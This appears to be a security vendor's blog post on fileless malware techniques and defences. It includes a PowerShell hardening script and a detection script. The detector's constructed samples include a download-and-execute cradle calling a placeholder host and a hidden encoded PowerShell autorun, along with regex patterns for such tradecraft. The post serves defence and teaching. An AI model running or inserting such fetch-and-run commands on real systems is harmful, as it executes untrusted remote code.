What is Fileless Malware?
Fileless malware is malicious code that resides in RAM and executes directly from memory rather than being written to the hard drive.
Fileless malware and Living off the Land (LotL) attacks rely on similar techniques: abusing scripts and trusted built-in tools, such as PowerShell, Windows Management Instrumentation (WMI), or RDP sessions, to execute payloads in memory on targeted endpoints.
According to the Ponemon Institute, fileless malware attacks are roughly ten times more likely to succeed than traditional file-based attacks. This is especially concerning for MSPs who manage remote teams with unsecured access to the corporate network, as threat actors can compromise endpoints and multiple cloud environments without triggering any alarms.
In this blog, we’ll explore the common attack techniques, real-world examples, and the defensive strategies you can implement to prevent fileless malware attacks.
How Does Fileless Malware Work?
Unlike traditional malware that installs files on disk, fileless malware executes directly from scripts or memory, evading signature-based detection and complicating containment efforts.
PowerShell is a popular attack tool because it can be run remotely and executes commands directly in memory. For example, an employee might open a phishing attachment carefully disguised as a trusted Microsoft Word document, whose malicious macros or embedded scripts then launch a PowerShell command on the targeted system.
That command can then modify registry settings, override security policies, disable event logging, and open pathways for lateral movement across endpoints and servers, all without leaving a file-based footprint. The payload persists in memory until the system is rebooted, and by that time an attacker may have exfiltrated gigabytes or even terabytes of sensitive data.
An attacker can continue to operate in stealth mode, harvesting credentials and escalating to admin privileges, while evading traditional antivirus software, which is not fully effective even against conventional forms of malware: research showed that 20% of all recaptured malware logs came from devices that had an antivirus program installed at the time the malware executed successfully.
Other forms of fileless malware include reflective DLL injection and reflective EXE self-injection, where attackers run malicious code directly within the memory of a targeted process, bypassing the file system and traditional security defenses.
Fileless attacks are a real challenge for MSPs responsible for securing remote workers, unmanaged devices, and hybrid cloud infrastructure with limited visibility into endpoint activity or into the access policy permissions granted to third-party vendors. For example, a malicious PsExec command could be executed on an unmanaged device by leveraging an active admin-level account that was never disabled after a contractor’s agreement ended or an employee left the organization.
Types of Fileless Malware Techniques
PowerShell might be considered the most popular attack method, but there are several other techniques to be aware of the next time you perform a cybersecurity risk assessment.
- Registry-resident malware: Attackers inject malicious code into the Windows Registry by placing commands in registry keys that run automatically when a user logs in or when the system starts, allowing the code to persist in memory. This enables attackers to modify critical registry settings and execute various types of payloads to evade detection and bypass account or system controls. The malicious code can also be written in Python or JavaScript, and is typically obfuscated to avoid detection.
- Exploit kits: Open-source PowerShell frameworks, such as Empire and PowerSploit, can be used to manipulate tokens, steal Kerberos tickets, discover network configuration details, modify service binaries, harvest clipboard data, hijack execution flows, log keystrokes, capture screenshots on Windows and macOS systems, and obfuscate files. Although primarily designed for red team exercises and offensive security testing, these tools are frequently repurposed by threat actors to launch fileless malware attacks.
- Macro-based attacks: Microsoft Office documents can carry malicious macros, scripts written in Visual Basic for Applications (VBA) and embedded within Word, Excel, or PowerPoint files, which often arrive via phishing emails. When a user opens the document, these scripts execute directly in memory, allowing attackers to run payloads, manipulate system settings, or move laterally without leaving file traces.
How to Prevent Fileless Malware Attacks
Set PowerShell script policies and follow best practices: Set PowerShell’s execution policy to RemoteSigned or AllSigned so that unsigned scripts downloaded from the internet do not run by default. Avoid hardcoding credentials and limit user permissions by applying the principle of least privilege. Sign all scripts with a trusted certificate to ensure authenticity, and regularly review and audit scripts for security vulnerabilities.
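The PowerShell execution policy and the Office macro settings discussed above can be applied and verified with a script like the following. This is an added example, not code from the Guardz post or the Guardz product. It writes the same registry locations that Group Policy uses for PowerShell script block logging, module logging and transcription, sets the machine-wide execution policy, and sets the Office VBA macro policy for Word, Excel and PowerPoint. The function names, the Office version prefix (16.0) and the transcript share \\LOGSERVER\PSTranscripts$ are assumptions. One caveat a practitioner should keep in mind: Microsoft documents the execution policy as a safety feature rather than a security boundary, which is why the logging settings matter. Script block logging (Event ID 4104) records the content of scripts as they execute in memory, giving EDR and SIEM tooling the visibility that file-based scanning lacks.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the Guardz post. Applies and verifies the PowerShell
# and Office macro policies recommended in the post. Paths are the documented
# Group Policy registry locations; the Office version prefix (16.0) and the
# transcript share are assumptions, adjust them for your estate.

$PSPolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Set-PolicyValue {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [Parameter(Mandatory)] [string] $Name,
        [Parameter(Mandatory)] $Value,
        [string] $Kind = 'DWord'
    )
    # Create the key if it is missing, then write the value idempotently.
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Kind -Force | Out-Null
}

function Enable-PowerShellLogging {
    # Script block logging (Event ID 4104) records the de-obfuscated text of
    # every block PowerShell runs, including code that never touches disk.
    Set-PolicyValue "$PSPolicyRoot\ScriptBlockLogging" 'EnableScriptBlockLogging' 1
    # Module logging (Event ID 4103) records pipeline execution for all modules.
    Set-PolicyValue "$PSPolicyRoot\ModuleLogging" 'EnableModuleLogging' 1
    Set-PolicyValue "$PSPolicyRoot\ModuleLogging\ModuleNames" '*' '*' -Kind 'String'
    # Transcription writes a per-session transcript to a central, append-only share.
    Set-PolicyValue "$PSPolicyRoot\Transcription" 'EnableTranscripting' 1
    Set-PolicyValue "$PSPolicyRoot\Transcription" 'EnableInvocationHeader' 1
    Set-PolicyValue "$PSPolicyRoot\Transcription" 'OutputDirectory' '\\LOGSERVER\PSTranscripts$' -Kind 'String'  # placeholder share
}

function Set-ScriptExecutionPolicy {
    param([ValidateSet('RemoteSigned', 'AllSigned')] [string] $Policy = 'AllSigned')
    # RemoteSigned lets locally written scripts run but requires a trusted
    # signature on downloaded ones; AllSigned requires a signature on every
    # script and fits an estate that signs with an internal code-signing CA.
    # This call fails if a Group Policy execution policy already overrides the scope.
    Set-ExecutionPolicy -ExecutionPolicy $Policy -Scope LocalMachine -Force
}

function Set-OfficeMacroPolicy {
    # Per-user Office policy keys. VBAWarnings: 3 = run only digitally signed
    # macros, 4 = disable all macros without notification.
    # BlockContentExecutionFromInternet = 1 blocks macros in files that carry
    # the Mark-of-the-Web, which covers attachments saved from phishing emails.
    foreach ($app in 'Word', 'Excel', 'PowerPoint') {
        $key = "HKCU:\SOFTWARE\Policies\Microsoft\Office\16.0\$app\Security"
        Set-PolicyValue $key 'VBAWarnings' 3
        Set-PolicyValue $key 'BlockContentExecutionFromInternet' 1
    }
}

function Get-ScriptHardeningState {
    # Returns the effective state as one object so a compliance job can assert on it.
    $read = { param($Sub, $Name)
        (Get-ItemProperty -Path "$PSPolicyRoot\$Sub" -Name $Name -ErrorAction SilentlyContinue).$Name
    }
    [pscustomobject]@{
        ExecutionPolicy    = Get-ExecutionPolicy -Scope LocalMachine
        ScriptBlockLogging = ((& $read 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1)
        ModuleLogging      = ((& $read 'ModuleLogging' 'EnableModuleLogging') -eq 1)
        Transcription      = ((& $read 'Transcription' 'EnableTranscripting') -eq 1)
        TranscriptPath     = (& $read 'Transcription' 'OutputDirectory')
    }
}

Enable-PowerShellLogging
Set-ScriptExecutionPolicy -Policy 'AllSigned'
Set-OfficeMacroPolicy
Get-ScriptHardeningState | Format-List
```

Because these are the registry locations Group Policy itself writes, the same values are normally pushed fleet-wide through a GPO or an Intune configuration profile rather than run host by host; the HKCU macro keys written here apply only to the account that runs the script. Get-ScriptHardeningState is the piece worth keeping in an RMM compliance check, since it reports drift in the logging settings that the behavioral detections below depend on.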
Regularly patch and update systems: Ensure that PowerShell, operating systems (OS), and all installed applications are up to date with the latest security patches. Microsoft reported a record 1,360 vulnerabilities in 2024, with Office vulnerabilities increasing by 24%. Don’t overlook those critical software updates.
Conduct routine phishing simulations: Attackers often leverage trusted Microsoft branding to gain user trust, as seen in the recent phishing campaign that abused Microsoft 365’s Direct Send feature to deliver spoofed messages that appeared to be internal emails within the organization. That’s why it’s so essential to conduct regular phishing simulations that teach employees the common signs of a suspicious email, such as an attached Microsoft Word document carrying a malicious macro or script.
Implement advanced endpoint detection and response (EDR) tools: Deploy an EDR solution that uses behavioral baselining and analytics to detect indicators of compromise (IOCs) and other risk factors. The EDR should also be able to detect initial ransomware behaviors, like file modifications or encryption patterns, so your security team can prioritize mitigation efforts.
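Behavioral detection is where the registry-resident and script-based techniques described earlier become visible: an autorun value that launches a script host with an encoded command, or a logged script block that decodes Base64, pulls content from the network into Invoke-Expression, or loads an assembly reflectively. The following triage script is an added example, not code from the Guardz post or the Guardz product. It scores text against a small set of indicators (the patterns and weights are my assumptions, tuned so that one strong indicator alone warrants review), then applies the same scoring to the Run/RunOnce autorun keys and to PowerShell Script Block Logging events (Event ID 4104). The sample entries are constructed so the script runs offline; pass -Live on a Windows host with script block logging enabled to read real data.

```powershell
# Added example, not from the Guardz post. Scores command lines and script
# blocks for in-memory execution indicators, then applies that scoring to
# autorun registry values and to Script Block Logging events (Event ID 4104).
# Indicator patterns and weights are assumptions; tune them to your telemetry.

$Indicators = @(
    @{ Label = 'encoded command';   Pattern = '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}'; Weight = 5 }
    @{ Label = 'base64 decode';     Pattern = 'FromBase64String';                           Weight = 3 }
    @{ Label = 'invoke-expression'; Pattern = '\b(iex|invoke-expression)\b';                Weight = 3 }
    @{ Label = 'download cradle';   Pattern = 'DownloadString|DownloadData|Net\.WebClient|Invoke-WebRequest|\biwr\b'; Weight = 4 }
    @{ Label = 'hidden window';     Pattern = '-w(indowstyle)?\s+hidden';                   Weight = 2 }
    @{ Label = 'no profile';        Pattern = '-nop(rofile)?\b';                            Weight = 1 }
    @{ Label = 'reflective load';   Pattern = 'Reflection\.Assembly\]::Load';               Weight = 5 }
    @{ Label = 'memory api';        Pattern = 'VirtualAlloc|WriteProcessMemory|CreateRemoteThread'; Weight = 5 }
    @{ Label = 'script host';       Pattern = '\b(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b'; Weight = 2 }
)

function Get-FilelessIndicator {
    # Matches one text against every indicator; -match is case-insensitive.
    param([Parameter(Mandatory)] [AllowEmptyString()] [string] $Text)
    $hits = foreach ($i in $Indicators) { if ($Text -match $i.Pattern) { $i } }
    $score = 0
    foreach ($h in $hits) { $score += $h.Weight }
    [pscustomobject]@{
        Score      = $score
        Suspicious = ($score -ge 5)        # review threshold (assumption)
        Indicators = @($hits | ForEach-Object { $_.Label })
    }
}

$AutorunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

function Get-AutorunEntry {
    # Reads the live autorun values the post describes as registry-resident persistence.
    foreach ($key in $AutorunKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider metadata (PSPath, PSDrive, ...)
            [pscustomobject]@{ Source = $key; Name = $p.Name; Text = [string]$p.Value }
        }
    }
}

function Get-ScriptBlockEvent {
    param([int] $MaxEvents = 200)
    # 4104 events carry the executed script text in the ScriptBlockText data field.
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue | ForEach-Object {
        $data = ([xml]$_.ToXml()).Event.EventData.Data
        $text = ($data | Where-Object { $_.Name -eq 'ScriptBlockText' }).'#text'
        [pscustomobject]@{ Source = "4104 $($_.TimeCreated)"; Name = $_.RecordId; Text = [string]$text }
    }
}

# Constructed sample entries (not real telemetry) so the script runs offline.
# The Base64 blob decodes to a run of 'A' characters, not to a real command.
$SampleEntries = @(
    [pscustomobject]@{ Source = 'sample Run';  Name = 'OneDrive';      Text = '"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background' }
    [pscustomobject]@{ Source = 'sample Run';  Name = 'Updater';       Text = 'powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA' }
    [pscustomobject]@{ Source = 'sample 4104'; Name = 'constructed-1'; Text = 'Get-ChildItem C:\Reports | Where-Object Length -gt 1MB' }
    [pscustomobject]@{ Source = 'sample 4104'; Name = 'constructed-2'; Text = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage.ps1")' }
    [pscustomobject]@{ Source = 'sample 4104'; Name = 'constructed-3'; Text = '[System.Reflection.Assembly]::Load($bytes) | Out-Null' }
)

function Invoke-FilelessTriage {
    param([switch] $Live)
    $entries = if ($Live) { @(Get-AutorunEntry) + @(Get-ScriptBlockEvent) } else { $SampleEntries }
    foreach ($e in $entries) {
        $r = Get-FilelessIndicator -Text $e.Text
        [pscustomobject]@{
            Suspicious = $r.Suspicious; Score = $r.Score
            Indicators = ($r.Indicators -join ', '); Source = $e.Source; Name = $e.Name; Text = $e.Text
        }
    }
}

Invoke-FilelessTriage | Sort-Object Score -Descending | Format-Table -AutoSize -Wrap
```

On the constructed samples, the OneDrive autorun and the Get-ChildItem script block score 0, the encoded PowerShell autorun scores 10 (encoded command, hidden window, no profile, script host), the download cradle scores 7 and the reflective load scores 5, so the three entries that represent in-memory execution are the ones flagged for review. The point of scoring rather than single-pattern matching is that the weak indicators (no profile, hidden window, a script host in an autorun) are common in legitimate administration and only become interesting in combination; an EDR doing behavioral baselining applies the same logic at far greater depth, with process ancestry and memory operations as additional signals.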
Secure Your Inbox and Endpoints from Fileless Malware with the Guardz Identity-Centric Unified Platform
The Guardz AI + human-led MDR provides real-time analysis of process behavior, execution chains, and memory operations to detect fileless attacks. Guardz leverages behavioral AI to mitigate threats in real time with 24/7 threat detection, triage, and incident response, so your endpoints are thoroughly protected from fileless threats, such as Living off the Land (LotL) attacks.
With the Guardz ITDR, threats are correlated to specific user identities and consolidated into a unified incident timeline, enabling clearer context-rich data for more informed decision-making.
Guardz provides one-click automated response and remediation to isolate users and minimize time to containment. Keep your endpoints and inboxes secured, and prevent fileless malware attacks with Guardz.
Book a demo today.